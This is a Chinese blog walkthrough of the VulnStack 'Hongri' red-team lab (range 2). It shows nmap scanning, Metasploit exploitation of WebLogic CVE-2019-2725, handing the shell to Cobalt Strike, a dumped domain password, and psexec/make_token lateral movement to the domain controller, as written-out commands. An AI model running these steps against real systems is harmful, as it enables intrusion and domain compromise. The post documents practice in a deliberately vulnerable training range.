红日-VulnStack靶场-ATT&CK(二)

于 2023-10-01 20:53:53 发布
阅读量651 收藏 6
点赞数 1
文章标签: 网络 web安全 web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/braty_/article/details/133469441
版权

红日实战二:

前言:

VulnStack 是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。

环境准备:

环境搭建:

kali攻击机,Windows 2008(web服务),Windows 2012(DC域控),windows7 (PC机)。

网络拓扑图:

这里我们把web的weblogic的服务和360打开,把其余设备的防火墙打开。

一.信息收集:

1.端口扫描:

利用kali的nmap进行扫描,注意这里的web是有防火墙的,我们使用参数 -Pn 绕过防火墙进行扫描。发现80,445,7001三个有用的端口。7001是weblogic服务的端口。并且发现服务器信息是Windows server 2008 r2-2012。

nmap  -sV -Pn 192.168.31.80

我们试试访问 http://192.168.31.80http://192.168.31:7001试试,没有发现任何有用的信息。

2.目录扫描:

我们试试用工具扫描

a.使用diamap工具,发现一无所获。

 python dirmap.py -i http://192.168.31.80

b.使用dirsearch工具,依旧一无所获。

离谱。。。

c.最后试试御剑,依旧没有有用的信息。

3.漏洞扫描:

我们发现了7001端口,我们直接试试weblogicScan的漏洞扫描,发现两个漏洞。

二.漏洞利用

1.msf攻击

search cve-2019-2725
use 0
set rhosts 192.168.31.80
set lhost 192.168.31.216
set target 1
run

成功geshell。

视角转到web,发现360没有报攻击信息。

2.msf联动cs

a.我们先在kali上开启cs服务,物理机进行连接,添加监听器。

./teamserver 192.168.31.216 123456

b.我们在msf上,进行派生将shell弹到cs。

background
use exploit/windows/local/payload_inject
set session 1
set lport 6666
set DisablePayloadHandler true
run

设置一下连接延迟

sleep 5

三.域内信息收集

1.先试试提权,提权成功。

1.内网信息收集

查看靶机信息,收集内网网段,发现内网是10.10.10.0网段。

我们查看域内用户信息,我们发现域名 DC.de1ay.com

我们ping一下域名,发现域控ip。

2.抓取密码

抓一下web的密码,成功抓到是1qaz@WSX

四 .横向移动

还记得我们发现445端口吗,我们利用psexec进行内网横向移动。

1.创建smb监听器

2.横向移动

拿下域控!

这里也可以用命令去横向登录。

rev2self
​
make_token de1ay.com\administrator 1qaz@WSX
​
jump psexec DC smb

3.拿下pc

kitha.
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) 八、lateral-movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration(信息窃取
红日内网渗透靶场vulnstack2
snowlyzz的博客
09-20 1019
红日渗透学习
红日靶场2
weixin_48169878的博客
07-10 4563
1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0设置一个lan区段,所有主机都加入到这个lan区段结果如下:3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是
ATT&CK手册(修改版)
09-16
ATT&CK手册(修改版)
ATTCK-Tools-library:TimelineSec ATT&CK 工具库
05-05
ATT-CK-Tools-library 声明 本项目工具仅供测试使用,请勿用于违法用途,否则后果自负!
vultarget-a红日靶场全面解析(完整版)
问彡心的博客
11-02 8328
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
2021-7-7红日团队靶场
qq_45290991的博客
07-16 1万+
这是第次打靶场,也是实战第一次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利一波大佬神文:谢公子红日靶场一 一、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记
热门推荐
qq_41821603的博客
11-24 4万+
这里写目录标题一、环境搭建、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 域控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 域内PC (host-only) 、拿下web服务器 2.1 信息收集 ...
红日靶场()
qq_58091216的博客
05-02 1752
整体流程如下:信息收集 => weblogic漏洞利用 => 冰蝎连接上传大马 =>WEB主机上线CS => 内网信息收集 => MS17_010利用 => PTH => DC主机上线 => 挂代理3389登录PC主机 => 上传木马 => PC主机上线 => 构造黄金票据维权 => 痕迹清理。
红日靶场(一)
qq_58091216的博客
05-01 2808
红一1. 实验环境拓扑如下:2. 下载好镜像文件,下载地址:(13G,需要百度网盘会员)3.需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。网络配置完成,这三台虚拟主机默认开机密码都是。
ATT-CK-CN:ATTCK实操
02-05
ATT-CK-CN:ATTCK实操
ATT&CK框架介绍及战技术对照表
05-18
ATT&CK框架介绍及战技术对照表
ATT&CK 知识库(企业)中文版1
08-03
1.1 路过式下载 1 1.2 面向公众应用的利用 2 1.3 外部远程服务 3 1.4 硬件添加 4 1.5 通过移动存储进行复制 5 1.6 鱼叉式钓鱼攻击
Elemental:元素-ATTCK威胁库
05-01
Elemental是MITER ATTCK技术,Atomic Red Team测试和280多个Sigma规则的集中式威胁库。 它提供了另一种探索ATTCK数据集的方式,将相关的Atomic Red Team测试和Sigma规则映射到它们各自的技术。 Elemental允许...
红日内网渗透靶场2(ATK&CK红队评估实战靶场)
qq_45780190的博客
03-01 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 跟靶场一中的环境类似需要模拟内网和外网两个网段, PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。 PC配置如下: DC在该环境中充当是域控。DC配置如下 : WEB配置:需要两块网卡,相当于网关服务器。 这里需要将新增的网卡VMnet2,ip调成了10段。 网络配置完成,这三台虚拟主机默认开机密码都是:密码
ATT&CK红队评估实战靶场【胎儿教学】
weixin_47536169的博客
11-19 1784
ATT&CK红队评估实战靶场【胎儿教学】
内网渗透实战——红日ATT&CK系列靶场)学习笔记
ierciyuan的博客
09-14 2774
内网渗透实战攻打红日靶场02,包括环境配置、信息收集、漏洞利用、内网渗透等操作。
ATT&CK 红日2靶机渗透攻略
weixin_47311099的博客
01-27 5326
环境准备 红日靶场一下载地址 :http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶机通用密码:1qaz@WSX dc:win2012 web:win2008 初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去,并且登进去后启动C:\Oracle\Middleware\user_projects\domains\base_domain\startWebLogic.bat 启动时需要管理员身份(administ
MITRE ATT&CK
最新发布
09-17
MITRE ATT&CK是一个强大且庞大的框架,用于描述和组织关于攻击者战术和技术的知识。它可以帮助安全专业人员了解攻击者可能使用的方法和技术,并提供对防御和检测措施的指导。 ATT&CK框架包括三个主要模型:ATT&CK for Enterprise、ATT&CK for Mobile和ATT&CK for ICS。ATT&CK for Enterprise适用于Windows、Linux、MacOS、云平台等技术和战术。ATT&CK for Mobile适用于移动设备的战术和技术。ATT&CK for ICS适用于工控设备的战术和技术。 ATT&CK框架使用矩阵的方式来展现攻击方的战术和技术。矩阵根据攻击者可能采取的不同行动进行分类。通过研究和理解ATT&CK矩阵,安全专业人员可以更好地了解攻击者的行为模式,并制定相应的防御策略和安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值